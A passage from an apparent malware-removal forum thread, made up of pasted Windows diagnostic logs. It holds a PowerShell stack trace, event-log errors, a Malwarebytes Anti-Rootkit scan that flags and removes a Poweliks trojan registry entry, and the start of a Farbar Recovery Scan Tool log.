System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)</p><p> at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])</p><p> at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()</p><p> at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)</p><p> at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])</p><p> at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])</p><p> at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()</p><p> at System.Management.Automation.Cmdlet.DoProcessRecord()</p><p> at System.Management.Automation.CommandProcessor.ProcessRecord()</p><p> at System.Management.Automation.CommandProcessorBase.DoExecute()</p><p> at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)</p><p> at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)</p><p> at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)</p><p> at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)</p><p> at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])</p><p> at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()</p><p> at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)</p><p> at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])</p><p> at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])</p><p> at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()</p><p> at System.Management.Automation.Cmdlet.DoProcessRecord()</p><p> at System.Management.Automation.CommandProcessor.ProcessRecord()</p><p> at System.Management.Automation.CommandProcessorBase.DoExecute()</p><p> at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)</p><p> at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)</p><p> at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)</p><p> at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)</p><p> at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)</p><p> at System.Management.Automation.DlrScriptCommandProcessor.Complete()</p><p> at System.Management.Automation.CommandProcessorBase.DoComplete()</p><p> at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)</p><p> at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)</p><p> at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()</p><p> at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()</p><p> at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()</p><p> at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)</p><p> at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)</p><p> at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)</p><p> at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)</p><p> at System.Threading.ThreadHelper.ThreadStart()</p><p></p><p>Error: (11/30/2014 07:39:05 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a55f</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x00061206</p><p>Faulting process id: 0x1f5ec</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p>Faulting package full name: iexplore.exe4</p><p>Faulting package-relative application ID: iexplore.exe5</p><p></p><p>Error: (11/30/2014 07:20:52 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a862</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x00061206</p><p>Faulting process id: 0x6c90</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p>Faulting package full name: iexplore.exe4</p><p>Faulting package-relative application ID: iexplore.exe5</p><p></p><p>Error: (11/30/2014 07:19:12 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010888a</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x00061206</p><p>Faulting process id: 0x2923c</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p>Faulting package full name: iexplore.exe4</p><p>Faulting package-relative application ID: iexplore.exe5</p><p></p><p></p><p>System errors:</p><p>=============</p><p>Error: (11/30/2014 09:08:33 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 09:08:02 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 09:07:31 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 09:07:00 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 09:00:52 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)</p><p>Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 51. The Windows SChannel error state is 900.</p><p></p><p>Error: (11/30/2014 08:56:02 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 08:55:31 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 08:55:00 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 08:54:29 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 08:53:58 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p></p><p>Microsoft Office Sessions:</p><p>=========================</p><p></p><p>==================== Memory info =========================== </p><p></p><p>Processor: Intel(R) Core(TM) i5-3210M CPU @ 2.50GHz</p><p>Percentage of memory in use: 28%</p><p>Total physical RAM: 8074.77 MB</p><p>Available physical RAM: 5737.82 MB</p><p>Total Pagefile: 16266.77 MB</p><p>Available Pagefile: 13875.43 MB</p><p>Total Virtual: 8192 MB</p><p>Available Virtual: 8191.78 MB</p><p></p><p>==================== Drives ================================</p><p></p><p>Drive c: () (Fixed) (Total:671.53 GB) (Free:279.17 GB) NTFS ==>[System with boot components (obtained from reading drive)]</p><p>Drive d: (RECOVERY) (Fixed) (Total:26.33 GB) (Free:3.11 GB) NTFS ==>[System with boot components (obtained from reading drive)]</p><p></p><p>==================== MBR & Partition Table ==================</p><p></p><p>========================================================</p><p>Disk: 0 (Size: 698.6 GB) (Disk ID: 04463ED8)</p><p></p><p>Partition: GPT Partition Type.</p><p></p><p>==================== End Of Log ============================</p></blockquote><p></p>
[QUOTE="stanm, post: 308296, member: 31324"] Malwarebytes Anti-Rootkit BETA 1.08.2.1001 [url="http://www.malwarebytes.org"]www.malwarebytes.org[/url] Database version: v2014.12.01.03 Windows 8 x64 NTFS Internet Explorer 10.0.9200.16466 johnsmith :: JASONSTORM [administrator] 12/1/2014 7:59:02 AM mbar-log-2014-12-01 (07-59-02).txt Scan type: Quick scan Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken Scan options disabled: Objects scanned: 337935 Time elapsed: 55 minute(s), 22 second(s) Memory Processes Detected: 0 (No malicious items detected) Memory Modules Detected: 0 (No malicious items detected) Registry Keys Detected: 1 HKU\S-1-5-21-2762839642-1568754923-376086736-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} (Trojan.Poweliks.B) -> Delete on reboot. [d1d60459d6a63cfaeba244be25db7987] Registry Values Detected: 0 (No malicious items detected) Registry Data Items Detected: 0 (No malicious items detected) Folders Detected: 0 (No malicious items detected) Files Detected: 3 C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe (TheftMarker.Crude) -> Delete on reboot. [ccdb7ae374083600e207281603ff0ef2] C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak (TheftMarker.Crude) -> Delete on reboot. [bdea3627ee8e61d525c49f9fd032718f] C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak.bak (TheftMarker.Crude) -> Delete on reboot. [f2b54914eb912f0744a54fefd42ee21e] Physical Sectors Detected: 0 (No malicious items detected) (end) Malwarebytes Anti-Rootkit BETA 1.08.2.1001 (c) Malwarebytes Corporation 2011-2012 OS version: 6.2.9200 Windows 8 x64 Account is Administrative Internet Explorer version: 10.0.9200.16466 File system is: NTFS Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED CPU speed: 2.494000 GHz Memory total: 8467005440, free: 6794969088 --------------------------------------- Malwarebytes Anti-Rootkit BETA 1.08.2.1001 (c) Malwarebytes Corporation 2011-2012 OS version: 6.2.9200 Windows 8 x64 Account is Administrative Internet Explorer version: 10.0.9200.16466 File system is: NTFS Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED CPU speed: 2.494000 GHz Memory total: 8467005440, free: 6802513920 Downloaded database version: v2014.12.01.03 Downloaded database version: v2014.12.01.01 ======================================= Initializing... This version of Malwarebytes Anti-Rootkit requires you to completely exit the Malwarebytes Anti-Malware application to continue. Initializing... ====================== ------------ Kernel report ------------ 12/01/2014 07:58:53 ------------ Loaded modules ----------- \SystemRoot\system32\ntoskrnl.exe \SystemRoot\system32\hal.dll \SystemRoot\system32\kd.dll \SystemRoot\system32\mcupdate_GenuineIntel.dll \SystemRoot\System32\drivers\CLFS.SYS \SystemRoot\System32\drivers\tm.sys \SystemRoot\system32\PSHED.dll \SystemRoot\system32\BOOTVID.dll \SystemRoot\system32\CI.dll \SystemRoot\System32\drivers\msrpc.sys \SystemRoot\system32\drivers\Wdf01000.sys \SystemRoot\system32\drivers\WDFLDR.SYS \SystemRoot\System32\Drivers\acpiex.sys \SystemRoot\System32\Drivers\WppRecorder.sys \SystemRoot\System32\drivers\ACPI.sys \SystemRoot\System32\drivers\WMILIB.SYS \SystemRoot\System32\Drivers\cng.sys \SystemRoot\System32\drivers\msisadrv.sys \SystemRoot\System32\drivers\pci.sys \SystemRoot\System32\drivers\vdrvroot.sys \SystemRoot\system32\drivers\pdc.sys \SystemRoot\System32\drivers\partmgr.sys \SystemRoot\System32\drivers\spaceport.sys \SystemRoot\System32\drivers\volmgr.sys \SystemRoot\System32\drivers\volmgrx.sys \SystemRoot\System32\drivers\mountmgr.sys \SystemRoot\System32\drivers\iaStorA.sys \SystemRoot\System32\drivers\storport.sys \SystemRoot\System32\drivers\EhStorClass.sys \SystemRoot\system32\drivers\fltmgr.sys \SystemRoot\System32\drivers\fileinfo.sys \SystemRoot\system32\drivers\WdFilter.sys \SystemRoot\System32\Drivers\Ntfs.sys \SystemRoot\System32\Drivers\ksecdd.sys \SystemRoot\System32\drivers\pcw.sys \SystemRoot\System32\Drivers\Fs_Rec.sys \SystemRoot\system32\drivers\ndis.sys \SystemRoot\system32\drivers\NETIO.SYS \SystemRoot\System32\Drivers\ksecpkg.sys \SystemRoot\System32\drivers\tcpip.sys \SystemRoot\System32\drivers\fwpkclnt.sys \SystemRoot\system32\DRIVERS\wfplwfs.sys \SystemRoot\System32\DRIVERS\fvevol.sys \SystemRoot\system32\DRIVERS\hpdskflt.sys \SystemRoot\System32\drivers\wd.sys \SystemRoot\System32\drivers\volsnap.sys \SystemRoot\System32\drivers\rdyboost.sys \SystemRoot\System32\Drivers\mup.sys \SystemRoot\System32\drivers\disk.sys \SystemRoot\System32\drivers\CLASSPNP.SYS \SystemRoot\System32\Drivers\crashdmp.sys \SystemRoot\System32\drivers\cdrom.sys \SystemRoot\System32\Drivers\Null.SYS \SystemRoot\System32\Drivers\Beep.SYS \SystemRoot\System32\drivers\BasicRender.sys \SystemRoot\System32\drivers\dxgkrnl.sys \SystemRoot\System32\drivers\watchdog.sys \SystemRoot\System32\drivers\dxgmms1.sys \SystemRoot\System32\drivers\BasicDisplay.sys \SystemRoot\System32\Drivers\Npfs.SYS \SystemRoot\System32\Drivers\Msfs.SYS \SystemRoot\system32\DRIVERS\tdx.sys \SystemRoot\system32\DRIVERS\TDI.SYS \SystemRoot\System32\DRIVERS\netbt.sys \SystemRoot\system32\drivers\afd.sys \SystemRoot\system32\DRIVERS\pacer.sys \SystemRoot\system32\DRIVERS\vwififlt.sys \SystemRoot\system32\DRIVERS\netbios.sys \SystemRoot\system32\DRIVERS\rdbss.sys \SystemRoot\system32\DRIVERS\wanarp.sys \SystemRoot\system32\drivers\nsiproxy.sys \SystemRoot\System32\drivers\npsvctrig.sys \SystemRoot\System32\drivers\mssmbios.sys \SystemRoot\System32\drivers\discache.sys \SystemRoot\System32\Drivers\dfsc.sys \SystemRoot\system32\DRIVERS\CLVirtualDrive.sys \SystemRoot\system32\DRIVERS\ndistapi.sys \SystemRoot\system32\DRIVERS\ndiswan.sys \SystemRoot\system32\DRIVERS\rassstp.sys \SystemRoot\system32\DRIVERS\AgileVpn.sys \SystemRoot\system32\DRIVERS\tunnel.sys \SystemRoot\System32\drivers\CompositeBus.sys \SystemRoot\system32\DRIVERS\kdnic.sys \SystemRoot\System32\drivers\umbus.sys \SystemRoot\system32\DRIVERS\igdkmd64.sys \SystemRoot\System32\drivers\USBXHCI.SYS \SystemRoot\System32\drivers\ucx01000.sys \SystemRoot\System32\drivers\HECIx64.sys \SystemRoot\System32\drivers\usbehci.sys \SystemRoot\System32\drivers\USBPORT.SYS \SystemRoot\System32\drivers\HDAudBus.sys \SystemRoot\system32\DRIVERS\RtsBaStor.sys \SystemRoot\system32\DRIVERS\Rt630x64.sys \SystemRoot\System32\drivers\i8042prt.sys \SystemRoot\system32\DRIVERS\SynTP.sys \SystemRoot\system32\DRIVERS\USBD.SYS \SystemRoot\System32\drivers\kbdclass.sys \SystemRoot\System32\drivers\mouclass.sys \SystemRoot\System32\drivers\CmBatt.sys \SystemRoot\System32\drivers\BATTC.SYS \SystemRoot\system32\DRIVERS\Smb_driver_Intel.sys \SystemRoot\system32\DRIVERS\Accelerometer.sys \SystemRoot\System32\drivers\wmiacpi.sys \SystemRoot\System32\drivers\WirelessButtonDriver64.sys \SystemRoot\System32\drivers\HIDCLASS.SYS \SystemRoot\System32\drivers\HIDPARSE.SYS \SystemRoot\System32\drivers\intelppm.sys \SystemRoot\system32\DRIVERS\raspptp.sys \SystemRoot\system32\DRIVERS\rasl2tp.sys \SystemRoot\system32\DRIVERS\raspppoe.sys \SystemRoot\System32\drivers\swenum.sys \SystemRoot\System32\drivers\ks.sys \SystemRoot\System32\drivers\rdpbus.sys \SystemRoot\System32\Drivers\NDProxy.SYS \SystemRoot\System32\drivers\usbhub.sys \SystemRoot\System32\drivers\UsbHub3.sys \SystemRoot\system32\DRIVERS\stwrt64.sys \SystemRoot\system32\DRIVERS\portcls.sys \SystemRoot\system32\DRIVERS\drmk.sys \SystemRoot\system32\drivers\ksthunk.sys \SystemRoot\system32\DRIVERS\IntcDAud.sys \SystemRoot\System32\drivers\hidusb.sys \SystemRoot\System32\drivers\mouhid.sys \SystemRoot\System32\drivers\usbccgp.sys \SystemRoot\System32\Drivers\usbvideo.sys \SystemRoot\System32\Drivers\fastfat.SYS \SystemRoot\System32\Drivers\dump_diskdump.sys \SystemRoot\System32\Drivers\dump_iaStorA.sys \SystemRoot\System32\Drivers\dump_dumpfve.sys \SystemRoot\System32\win32k.sys \SystemRoot\system32\DRIVERS\monitor.sys \SystemRoot\System32\TSDDD.dll \SystemRoot\System32\cdd.dll \SystemRoot\System32\ATMFD.DLL \SystemRoot\system32\drivers\luafv.sys \SystemRoot\system32\drivers\WudfPf.sys \SystemRoot\System32\drivers\WinUSB.sys \SystemRoot\System32\drivers\WUDFRd.sys \SystemRoot\system32\DRIVERS\lltdio.sys \SystemRoot\system32\DRIVERS\nwifi.sys \SystemRoot\system32\DRIVERS\ndisuio.sys \SystemRoot\system32\DRIVERS\rspndr.sys \SystemRoot\system32\drivers\HTTP.sys \SystemRoot\system32\DRIVERS\bowser.sys \SystemRoot\System32\drivers\mpsdrv.sys \SystemRoot\system32\DRIVERS\mrxsmb.sys \SystemRoot\system32\DRIVERS\mrxsmb10.sys \SystemRoot\system32\DRIVERS\mrxsmb20.sys \SystemRoot\system32\drivers\Ndu.sys \SystemRoot\system32\drivers\peauth.sys \SystemRoot\System32\Drivers\secdrv.SYS \SystemRoot\System32\DRIVERS\srvnet.sys \SystemRoot\System32\drivers\tcpipreg.sys \SystemRoot\System32\DRIVERS\srv2.sys \SystemRoot\System32\DRIVERS\srv.sys \??\C:\Windows\system32\drivers\hitmanpro37.sys \SystemRoot\system32\DRIVERS\cdfs.sys \SystemRoot\System32\drivers\condrv.sys \SystemRoot\system32\DRIVERS\netr28x.sys \SystemRoot\System32\drivers\vwifibus.sys \SystemRoot\system32\DRIVERS\vwifimp.sys \??\C:\Windows\system32\drivers\mbamchameleon.sys \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys ----------- End ----------- Done! <<<1>>> Upper Device Name: \Device\Harddisk0\DR0 Upper Device Object: 0xfffffa80096d8060 Upper Device Driver Name: \Driver\disk\ Lower Device Name: \Device\00000047\ Lower Device Object: 0xfffffa8007d6f2b0 Lower Device Driver Name: \Driver\iaStorA\ <<<2>>> Physical Sector Size: 512 Drive: 0, DevicePointer: 0xfffffa80096d8060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\ --------- Disk Stack ------ DevicePointer: 0xfffffa80096d8b10, DeviceName: Unknown, DriverName: \Driver\partmgr\ DevicePointer: 0xfffffa80096d8060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\ DevicePointer: 0xfffffa8008796b10, DeviceName: Unknown, DriverName: \Driver\hpdskflt\ DevicePointer: 0xfffffa8007d6f2b0, DeviceName: \Device\00000047\, DriverName: \Driver\iaStorA\ ------------ End ---------- Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\ Upper DeviceData: 0x0, 0x0, 0x0 Lower DeviceData: 0x0, 0x0, 0x0 <<<3>>> Volume: C: File system type: NTFS SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes <<<2>>> <<<3>>> Volume: C: File system type: NTFS SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers... Done! Drive 0 This is a System drive Scanning MBR on drive 0... Inspecting partition table: This drive is a GPT Drive. MBR Signature: 55AA Disk Signature: 4463ED8 GPT Protective MBR Partition information: Partition 0 type is EFI-GPT (0xee) Partition is NOT ACTIVE. Partition starts at LBA: 1 Numsec = 1465149167 Partition 1 type is Empty (0x0) Partition is NOT ACTIVE. Partition starts at LBA: 0 Numsec = 0 Partition 2 type is Empty (0x0) Partition is NOT ACTIVE. Partition starts at LBA: 0 Numsec = 0 Partition 3 type is Empty (0x0) Partition is NOT ACTIVE. Partition starts at LBA: 0 Numsec = 0 GPT Partition information: GPT Header Signature 4546492050415254 GPT Header Revision 65536 Size 92 CRC 4060582503 GPT Header CurrentLba = 1 BackupLba 1465149167 GPT Header FirstUsableLba 34 LastUsableLba 1465149134 GPT Header Guid db36cdd8-6a1-4593-82f7-fe8be9635ce3 GPT Header Contains 128 partition entries starting at LBA 2 GPT Header Partition entry size = 128 Backup GPT header Signature 4546492050415254 Backup GPT header Revision 65536 Size 92 CRC 4060582503 Backup GPT header CurrentLba = 1465149167 BackupLba 1 Backup GPT header FirstUsableLba 34 LastUsableLba 1465149134 Backup GPT header Guid db36cdd8-6a1-4593-82f7-fe8be9635ce3 Backup GPT header Contains 128 partition entries starting at LBA 1465149135 Backup GPT header Partition entry size = 128 Partition 0 Type de94bba4-6d1-4d40-a16a-bfd5179d6ac Partition ID cc93694e-549f-490e-b691-2744edbc3472 FirstLBA 2048 Last LBA 821247 Attributes 1 Partition Name Basic data partition Partition 1 Type c12a7328-f81f-11d2-ba4b-0a0c93ec93b Partition ID 59e6ba52-631b-42dd-856d-9d753560f97b FirstLBA 821248 Last LBA 1353727 Attributes 0 Partition Name EFI system partition GPT Partition 1 is bootable Partition 2 Type e3c9e316-b5c-4db8-817d-f92df0215ae Partition ID 9a4c6918-cf88-492b-84ee-b13ab7aa249f FirstLBA 1353728 Last LBA 1615871 Attributes 0 Partition Name Microsoft reserved partition Partition 3 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7 Partition ID 318bc6ab-44d7-469d-9893-cca19ba3d3a FirstLBA 1615872 Last LBA 1409910783 Attributes 0 Partition Name Basic data partition Partition 4 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7 Partition ID fafe7be9-88d0-424f-8a61-d41894123c FirstLBA 1409910784 Last LBA 1465135103 Attributes 1 Partition Name Basic data partition Disk Size: 750156374016 bytes Sector size: 512 bytes Done! Infected: C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe --> [TheftMarker.Crude] Infected: C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak --> [TheftMarker.Crude] Infected: C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak.bak --> [TheftMarker.Crude] Infected: HKU\S-1-5-21-2762839642-1568754923-376086736-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} --> [Trojan.Poweliks.B] Scan finished Creating System Restore point... Cleaning up... Removal scheduling successful. System shutdown needed. System shutdown occurred ======================================= Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 30-11-2014 01 Ran by johnsmith (administrator) on JASONSTORM on 01-12-2014 09:52:05 Running from C:\Users\johnsmith\Desktop\removal tools Loaded Profile: johnsmith (Available profiles: johnsmith) Platform: Windows 8 (X64) OS Language: English (United States) Internet Explorer Version 10 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: [url]http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/[/url] ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (HP) C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe (IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe (IvoSoft) C:\Program Files\Classic Shell\ClassicShellService.exe (Hewlett-Packard Company) C:\Windows\System32\hpservice.exe (ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes 